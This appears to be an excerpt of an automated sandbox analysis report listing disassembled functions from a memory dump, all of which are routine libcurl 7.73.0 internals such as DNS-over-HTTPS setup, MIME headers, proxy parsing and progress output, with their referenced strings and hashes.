                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8FE683
                                                                                                                                  • curl_maprintf.LIBCURL(%s?dns=%s,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 6B8FE753
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002712,00000000,?,?,?,?,00000000,?,?,?), ref: 6B8FE806
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00004E2B,6B8FE5E0,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6B8FE825
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002711,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6B8FE849
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000271F,?), ref: 6B8FE86F
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000003C,?), ref: 6B8FE88C
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002727,?), ref: 6B8FE8A9
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000B5,00000002), ref: 6B8FE8C5
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000009B,?), ref: 6B8FE8E2
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000029,00000001), ref: 6B8FE903
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000063,00000001), ref: 6B8FE925
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000E9,00000001), ref: 6B8FE94A
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000051,00000002), ref: 6B8FE96C
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000F9,00000002), ref: 6B8FE991
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000F8,00000001), ref: 6B8FE9B6
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002806,?), ref: 6B8FE9DB
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002814,?), ref: 6B8FEA00
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000105,00000008), ref: 6B8FEA32
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002807,?), ref: 6B8FEA57
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00000040,00000001), ref: 6B8FEA79
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000E8,00000001), ref: 6B8FEA9E
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002751,?), ref: 6B8FEAC3
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00002771,?), ref: 6B8FEAE8
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000027B9,?), ref: 6B8FEB0D
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000AC,00000001), ref: 6B8FEB32
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000275C,?), ref: 6B8FEB57
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000275D,?), ref: 6B8FEB7C
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,000000D8,00000008), ref: 6B8FEBAE
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,00004E8C,?), ref: 6B8FEBD3
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000277D,?), ref: 6B8FEBF8
                                                                                                                                  • curl_easy_setopt.LIBCURL(00000000,0000283A,?), ref: 6B8FEC1D
                                                                                                                                  • curl_multi_add_handle.LIBCURL(?,00000000), ref: 6B8FEC4E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_setopt$___from_strstr_to_strchrcurl_maprintfcurl_multi_add_handle
                                                                                                                                  • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                                  • API String ID: 667061265-3030351490
                                                                                                                                  • Opcode ID: 07eb24440078b084f2de04d950d306fedbe7f4ff481d4b0622cb8226704b0d6c
                                                                                                                                  • Instruction ID: c273999a6a016736d116d131eb06165d353f07298013bda61541d265ecf42a0e
                                                                                                                                  • Opcode Fuzzy Hash: 07eb24440078b084f2de04d950d306fedbe7f4ff481d4b0622cb8226704b0d6c
                                                                                                                                  • Instruction Fuzzy Hash: D9F14A71E44215FBEF228A70CC42B8A7BA9AF107D5F0406E4EC54BB291D7AE8E51C7D0
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%5I64d,?,?,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD02A
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD053
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dk,00000000,?,?,?,00000400,00000000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD065
                                                                                                                                  • __allrem.LIBCMT ref: 6B8FD08A
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD098
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD0A8
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dM,00000000,?,?,?,00100000,00000000,00000000,?,00000000,?,00019999,00000000,?), ref: 6B8FD0BA
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD0E0
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dM,00000000,?,?,?,00100000,00000000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD0F2
                                                                                                                                  • __allrem.LIBCMT ref: 6B8FD114
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD122
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD132
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dG,00000000,?,?,?,40000000,00000000,00000000,?,00000000,?,06666666,00000000,?), ref: 6B8FD144
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD169
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dG,00000000,?,?,?,40000000,00000000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD17B
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD1A0
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dT,00000000,?,?,?,00000000,00000100,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD1B2
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD1C9
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000006,%4I64dP,00000000,?,?,?,00000000,00040000,92935E00,6B8E1696,?,6B8FD8FE,0B2083C7,00000000,?), ref: 6B8FD1DB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                                  • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                  • API String ID: 3299120379-2102732564
                                                                                                                                  • Opcode ID: fecdbff301afe0f417d7a72c2a5059cca32ac20230e01523ae4d18eff57ea1fc
                                                                                                                                  • Instruction ID: eea98cfa0bff0f25150174a6b85636068042e8138635dd91d52410380b3798c9
                                                                                                                                  • Opcode Fuzzy Hash: fecdbff301afe0f417d7a72c2a5059cca32ac20230e01523ae4d18eff57ea1fc
                                                                                                                                  • Instruction Fuzzy Hash: D641C6A7FC066436E63059682C12FAF631CDBD2F99F154869FB09BB181935CA81343F9
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D9245
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D92AB
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D92BD
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D92D1
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D9364
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D9376
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D938A
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D939F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.73.0%sQUIT$CLIENT libcurl 7.73.0DEFINE %s %sQUIT$CLIENT libcurl 7.73.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                                                                                                                  • API String ID: 601868998-3098048912
                                                                                                                                  • Opcode ID: f9243aa8a47698230e88e5d0091c09f786b409458dd647097b8da1df6ec4b4f1
                                                                                                                                  • Instruction ID: 105db3ab285a21ad8e5ab69fbf44a551d7bd71b5528beb1e0dc0b691208536cc
                                                                                                                                  • Opcode Fuzzy Hash: f9243aa8a47698230e88e5d0091c09f786b409458dd647097b8da1df6ec4b4f1
                                                                                                                                  • Instruction Fuzzy Hash: 00714B22E0461967D7110A795C52B6E7B798FE276DF1405EAEC586B283FB3EC90083F1
                                                                                                                                  APIs
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,00000000,?,?,multipart/form-data), ref: 6B8F2B8F
                                                                                                                                  • curl_strequal.LIBCURL(?,attachment,?,?,?,multipart/form-data), ref: 6B8F2CCC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_allcurl_strequal
                                                                                                                                  • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                                  • API String ID: 3213019040-1595554923
                                                                                                                                  • Opcode ID: 74a33f8eb84c51fb9fea66b6649eeb8375ef3fec14f9ff2591f4acd5f767bc21
                                                                                                                                  • Instruction ID: 467f5f5046db05a30011fd44ce04951c29754a0a6a736c8c890c64af3684475d
                                                                                                                                  • Opcode Fuzzy Hash: 74a33f8eb84c51fb9fea66b6649eeb8375ef3fec14f9ff2591f4acd5f767bc21
                                                                                                                                  • Instruction Fuzzy Hash: 0B91EFB1A00B859BDB119F698981B4777FEAF843D8B108C7DF84AD7611E73CE8068B51
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD566
                                                                                                                                  • curl_mfprintf.LIBCURL(89000005,** Resuming transfer from byte position %I64d,00051C86,BF830000,83C70000,00000620,000F4240,00000000,868D0000,6B8E1696,?), ref: 6B8FD59D
                                                                                                                                  • curl_mfprintf.LIBCURL(89000005, %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed,83C70000,00000620,000F4240,00000000,868D0000,6B8E1696,?), ref: 6B8FD5B0
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD5FF
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD623
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD636
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD677
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD6D5
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD702
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD715
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD76F
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD891
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD8A1
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD8C7
                                                                                                                                  • curl_mfprintf.LIBCURL(89000005,%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 6B8FD9A1
                                                                                                                                  Strings
                                                                                                                                  • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6B8FD5A5
                                                                                                                                  • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6B8FD996
                                                                                                                                  • ** Resuming transfer from byte position %I64d, xrefs: 6B8FD592
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_mfprintf
                                                                                                                                  • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                                                                                                                  • API String ID: 2030109004-664487449
                                                                                                                                  • Opcode ID: e0023093bc332130ba7ecf1f3d2b5e57b4dd63c1d220d25170e5be1ca3538a93
                                                                                                                                  • Instruction ID: 9551a7cb5d0ebcd34bdcfde914e7dbeb39c39b0b20cbc91be099696f1ea9f666
                                                                                                                                  • Opcode Fuzzy Hash: e0023093bc332130ba7ecf1f3d2b5e57b4dd63c1d220d25170e5be1ca3538a93
                                                                                                                                  • Instruction Fuzzy Hash: 81E12F75A407089FEB208BB8CC41BAABBB9BF45348F108859AA5DA7251DB396841DF50
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8EAB26
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8EAB3C
                                                                                                                                  • curl_strnequal.LIBCURL(Host:,00000000,00000005), ref: 6B8EAC1A
                                                                                                                                  • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B8EAC3E
                                                                                                                                  • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B8EAC62
                                                                                                                                  • curl_strnequal.LIBCURL(Content-Length:,00000000,0000000F), ref: 6B8EAC86
                                                                                                                                  • curl_strnequal.LIBCURL(Connection:,00000000,0000000B), ref: 6B8EACAA
                                                                                                                                  • curl_strnequal.LIBCURL(Transfer-Encoding:,00000000,00000012), ref: 6B8EACCE
                                                                                                                                  • curl_strnequal.LIBCURL(Authorization:,00000000,0000000E), ref: 6B8EACE2
                                                                                                                                  • curl_strnequal.LIBCURL(Cookie:,00000000,00000007,?,?,?,?,?,?,6B8EE55E), ref: 6B8EACF6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal$___from_strstr_to_strchr
                                                                                                                                  • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                                                                                                                  • API String ID: 431725195-2985882615
                                                                                                                                  • Opcode ID: 5d87a5f4419c2e7a08b88f237137a572b377d864794a789a19492a3e37228322
                                                                                                                                  • Instruction ID: 001de49fb246a9a3f9d0086516fde11f022170df909a37d49f49111b57d96e13
                                                                                                                                  • Opcode Fuzzy Hash: 5d87a5f4419c2e7a08b88f237137a572b377d864794a789a19492a3e37228322
                                                                                                                                  • Instruction Fuzzy Hash: A4916871E04205ABEB108E64D940B967BB6AF43B1CF0448F8EC589B242E77ED947C7B0
                                                                                                                                  APIs
                                                                                                                                  • curl_url.LIBCURL(00000000,00000000,6B8E2F71), ref: 6B8E478E
                                                                                                                                  • curl_url_set.LIBCURL(00000000,00000000,00000000,00000208,00000000,00000000,6B8E2F71), ref: 6B8E47A6
                                                                                                                                  • curl_url_get.LIBCURL(6B8E2F71,00000001,00000000,00000000,?,00000000,00000000,6B8E2F71), ref: 6B8E47C0
                                                                                                                                  • curl_url_cleanup.LIBCURL(6B8E2F71,?,?,?,?,00000000,00000000,6B8E2F71), ref: 6B8E4A84
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_urlcurl_url_cleanupcurl_url_getcurl_url_set
                                                                                                                                  • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                                                                                                                                  • API String ID: 4131495542-874090715
                                                                                                                                  • Opcode ID: 17f75bc3dd07b6c412261e3e287406e80ba40f0022a2be9e5555dc7eff4317c6
                                                                                                                                  • Instruction ID: 1191b326b030e87c91b1d450db3abfe5795d61b52d92713cb925e5b979686c24
                                                                                                                                  • Opcode Fuzzy Hash: 17f75bc3dd07b6c412261e3e287406e80ba40f0022a2be9e5555dc7eff4317c6
                                                                                                                                  • Instruction Fuzzy Hash: 4C91C275C44219ABDF009FA5CC41B9EBBB4AF82309F0844B9ED1877251E739DA12DBB1
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(Authorization: Bearer %s,?,?,?,?,?,?,?,?,?), ref: 6B8ECFF2
                                                                                                                                  • curl_maprintf.LIBCURL(%s:%s,?,6B93B98E,?,00000000), ref: 6B8ED106
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B8ED180
                                                                                                                                    • Part of subcall function 6B8F48E0: curl_mvaprintf.LIBCURL(?,?,?,6B8D66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B8F48EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf$curl_mvaprintf
                                                                                                                                  • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                                  • API String ID: 3491783128-3980008082
                                                                                                                                  • Opcode ID: be52859626718121c403697bf5e58aa33d6cadb7c4e272c395097a1ee2bc2585
                                                                                                                                  • Instruction ID: 713c70b01bbbde266f82553f4b9634b1f9d18d721a5bde1833b1fc44bca1d672
                                                                                                                                  • Opcode Fuzzy Hash: be52859626718121c403697bf5e58aa33d6cadb7c4e272c395097a1ee2bc2585
                                                                                                                                  • Instruction Fuzzy Hash: 6281C635A44119AFDB008E68D8517AAB7B4EF87355F0884A6FC08DB311D339DD56CBB1
                                                                                                                                  APIs
                                                                                                                                  • curl_url_dup.LIBCURL(?,00000000,?,?,?), ref: 6B8E4AD5
                                                                                                                                  • curl_url.LIBCURL(00000000,?,?,?), ref: 6B8E4AE4
                                                                                                                                  • curl_maprintf.LIBCURL(%s://%s,?,?,?,?,?,00000000,?,?,?), ref: 6B8E4B43
                                                                                                                                  • curl_url_set.LIBCURL(00000000,00000000,?,00000208), ref: 6B8E4B97
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000000,?,00000000,?,?,?,?,00000000,?,?,?), ref: 6B8E4BDB
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000001,?,00000000), ref: 6B8E4C1A
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000002,?,00000000), ref: 6B8E4CA5
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000003,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B8E4D10
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000004,?,00000040), ref: 6B8E4D77
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000005,?,00000000), ref: 6B8E4DBD
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000007,?,00000000), ref: 6B8E4DEC
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000006,?,00000001), ref: 6B8E4E08
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000008,?,00000000), ref: 6B8E4E6A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_url_get$curl_maprintfcurl_urlcurl_url_dupcurl_url_set
                                                                                                                                  • String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$file
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000007,:%u,?), ref: 6B8E7F89
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E8007
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E80B6
                                                                                                                                  Strings
                                                                                                                                  • Resolve address '%s' found illegal!, xrefs: 6B8E81A2
                                                                                                                                  • Couldn't parse CURLOPT_RESOLVE removal entry '%s'!, xrefs: 6B8E7EFB
                                                                                                                                  • *, xrefs: 6B8E82DD
                                                                                                                                  • %255[^:]:%d, xrefs: 6B8E7EE6
                                                                                                                                  • Couldn't parse CURLOPT_RESOLVE entry '%s'!, xrefs: 6B8E831E
                                                                                                                                  • Added %s:%d:%s to DNS cache, xrefs: 6B8E82CF
                                                                                                                                  • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 6B8E82FC
                                                                                                                                  • RESOLVE %s:%d is - old addresses discarded!, xrefs: 6B8E824E
                                                                                                                                  • :%u, xrefs: 6B8E7F81, 6B8E81EB
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchrcurl_msnprintf$curl_mvsnprintf
